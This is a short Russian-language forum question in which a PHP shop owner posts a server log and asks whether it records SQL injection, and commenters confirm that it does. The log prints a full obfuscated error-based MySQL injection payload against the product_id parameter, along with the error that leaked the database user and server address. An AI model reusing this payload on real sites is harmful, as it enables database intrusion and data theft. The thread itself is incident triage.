# Может быть это SQL инъекция

Tags: php

Недавно нашел в логах запись, я не сильно разбираюсь в этом. Это может быть SQL инъекция ?

```
Detected at URL: index.php?route=product/product&product_id=11721' 
and(/**/sElEcT 1 /**/fRoM(/**/sElEcT 
count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT 
/**/cOnCaT(0x217e21,/**/uSeR(),0x217e21)) /**/fRoM 
information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM 
information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1
Uncaught Exception: Error: Duplicate entry 
'!~!aberti00_db@91.206.201.176!~!1' for key ''
Error No: 1062 
SELECT quantity, product_stock FROM oc_product WHERE product_id = '11721' 
and(/**/sElEcT 1 /**/fRoM(/**/sElEcT 
count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT 
/**/cOnCaT(0x217e21,/**/uSeR(),0x217e21)) /**/fRoM 
information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM 
information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1' in 
system/library/db/mysqli.php:40
```

Comment: Если в теме можно подробней рассказать ?

Comment: вы сделали этому url_decode чтобы нормально прочитать что написано то?

Comment: Подправил это полная ошибка которая показывает в логах

Comment: видно же, что параметры дописаны в ваш URL, и далее же в логе видно, что они успешо ушли в запрос. И должно быть очевидно, что нельзя писать запросы вида $sql = "select.. .where product_id = '$product_id'"

Comment: Извините не совсем понял ответ можно подробней, так это SQL инъекция или нет ? Это не я делал такой запрос нашел в логах

Comment: Если вам прислали sql-код и этот sql-код выполнился - то да, это sql-инъекция

Comment: Да, это SQL-инъекция, прописанная в url-запрос